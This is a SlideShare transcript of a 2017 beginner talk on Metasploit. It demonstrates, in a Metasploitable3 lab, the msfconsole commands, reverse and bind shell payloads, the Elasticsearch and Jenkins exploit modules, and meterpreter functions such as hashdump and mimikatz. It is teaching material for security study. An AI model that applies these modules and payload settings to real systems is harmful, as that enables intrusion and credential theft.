Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Metasploit For Beginners

The Attached slide was presented at Null Open Security/OWAP/G4H combined community event, the document shared here is a representation of Independent study on usage of Metasploit on purpose built vulnerable machine Metasploitable3. With New attack vectors such as Elastic Search API and Jenkins servers -21/01/2017

Contains

1. Introduction to Metasploit (why metasploit?)
2. Demo Setup and talked on how to- Using Metasploitable3
3. Networking with VirtualBox for personal lab
4. Auxiliary Modules (Scanners and Servers ) - Demo of snmp_enum
5. Exploit Module (searching exploits)
6. Payload types
7. Exploit Demo 1 - /exploit/multi/elasticsearch/script_mvel_rce
8. Exploit Demo 2 -
/exploit/multi/http/jenkins_script_console

Related Books

Free with a 30 day trial from Scribd

See all

Related Audiobooks

Free with a 30 day trial from Scribd

See all
  • Be the first to comment

Metasploit For Beginners

  1. 1. Metasploit for Beginners Ramnath
  2. 2. Whoami Ramnath Shenoy • Engineering @ FireEye • https://www.linkedin.com/in/ramnathshenoyk • @Ramnathsk
  3. 3. Metasploit for Beginners ●Why Metasploit? ●Demo Setup ●Auxiliary Module ●Exploit Module ●Payloads ●Demo 1 - Elastic Search exploit ●Demo 2 - Jenkins exploit
  4. 4. Why Metasploit? ● Published independently ● Different programming languages ● Targeted limited to a specific platform ● No evasion techniques ● No clear documentation ● No coding style and difficult to embed /modify
  5. 5. Metasploit Framework Current stable version is v4.13.X • Written in ruby, https://github.com/rapid7/metasploit-framework.git, • [ 1610 exploits, 914 auxiliary, 279 post ,471 payloads , 39 encoders , 9 nops ] Ready in kali - used in this demo. Available as windows installer. (Never really tried!..)
  6. 6. Metasploit Architecture Libraries Interfaces Modules nops payloads exploits Auxiliary Encoder Post msfconsole Rex MSF::Core MSF::Base Tools Plugins
  7. 7. Visualising an attack Target Vulnerable software PayloadExploitAuxiliary Windows/Shell Windows/add user Remote exploit Local exploit Scan and enumerate Rogue Servers Post Enum credentials Exploit suggest Exploit Payload Post msfconsole
  8. 8. Demo Setup! Target Windows 2008 R2 – Metasploitable3 Designed vulnerable to test payload Setup instructions https://github.com/rapid7/metasploitable3 172.28.128.4 Metasploit/kali Attacker 172.28.128.3 Victim Windows 2k8 Virtual Box
  9. 9. Msfconsole Navigation cheat sheet! Msfupdate - update Msfconsole – initialize metasploit >help - example: help search >search – example: search name:pcman type:exploit >show - example show info, show options and show advanced >use - example use exploit/.., use aux/.., use payload/.. >set, unset, setg & unsetg - set payload/.. set exitfunc >back,previous Exploit ,POST and Payload specifics >set RHOST : Victim IP >set RPORT: Victim port >set LHOST: Attacker IP >set LPORT: Attacker Port on Reverse Connect or Victim Port on Bind >set SESSION: The Session id of an earlier attack to attempt Local priv esc
  10. 10. Commands Prior Demo! • Start the PostgreSQL, initialize database for metasploit and then proceed with starting msfconsole • Setup a workspace within metasploit to store enumeration result • Initialise a scan with nmap to store its results. Results in db will be accessible via “services”
  11. 11. Auxiliary Module - Demo • Brute Force access tests on different protocols. • Enumerate and gather more information with limited access. • Check for misconfigured or default Web Portals. • Set up a rogue- ftp,http,smb,imap servers
  12. 12. Auxiliary Module - “use auxiliary/scanner/snmp/snmp_enum”
  13. 13. Exploit Module Searching remote exploits are typically -> exploit/Platform/protocol/Application_or_service Searching local exploits are typically -> exploit/Platform/local/Application_or_service
  14. 14. Payload Module Bind Shell TCP • Successful exploitation leads to a new port on Victim with shell access. Reverse Shell TCP • Successful exploitation makes to client connect to Attack and provide its shell. BindShell-Listener Reverse Shell-Listener Exploit Exploit
  15. 15. Exploit Module -Demo exploit/multi/elasticsearch/script_mvel_rce ElasticSearch ->1.1.1 Payload -> java/shell/reverse_tcp
  16. 16. Exploit Module 2 In these cases we will need to use the attacker machine as a server, servicing the delivery of the exploit. We will need 2 more options, SRVHOST and SRVPORT Meterpreter Payload ,provides an interactive environment with functionalities likes • Getsystem, clearnenv, migrate, hashdump, post, up/download,edit • Run portrecorder , load mimikatz..
  17. 17. Exploit Module -Demo 2 • exploit/multi/http/jenkins_script_console • windows/meterpreter/reverse_tcp
  18. 18. Thanks.

    Be the first to comment

    Login to see the comments

  • AvradeepBhattacharya

    Feb. 19, 2017
  • Precocioussymphonii

    Mar. 24, 2017

The Attached slide was presented at Null Open Security/OWAP/G4H combined community event, the document shared here is a representation of Independent study on usage of Metasploit on purpose built vulnerable machine Metasploitable3. With New attack vectors such as Elastic Search API and Jenkins servers -21/01/2017 Contains 1. Introduction to Metasploit (why metasploit?) 2. Demo Setup and talked on how to- Using Metasploitable3 3. Networking with VirtualBox for personal lab 4. Auxiliary Modules (Scanners and Servers ) - Demo of snmp_enum 5. Exploit Module (searching exploits) 6. Payload types 7. Exploit Demo 1 - /exploit/multi/elasticsearch/script_mvel_rce 8. Exploit Demo 2 - /exploit/multi/http/jenkins_script_console

Views

Total views

861

On Slideshare

0

From embeds

0

Number of embeds

51

Actions

Downloads

33

Shares

0

Comments

0

Likes

2

×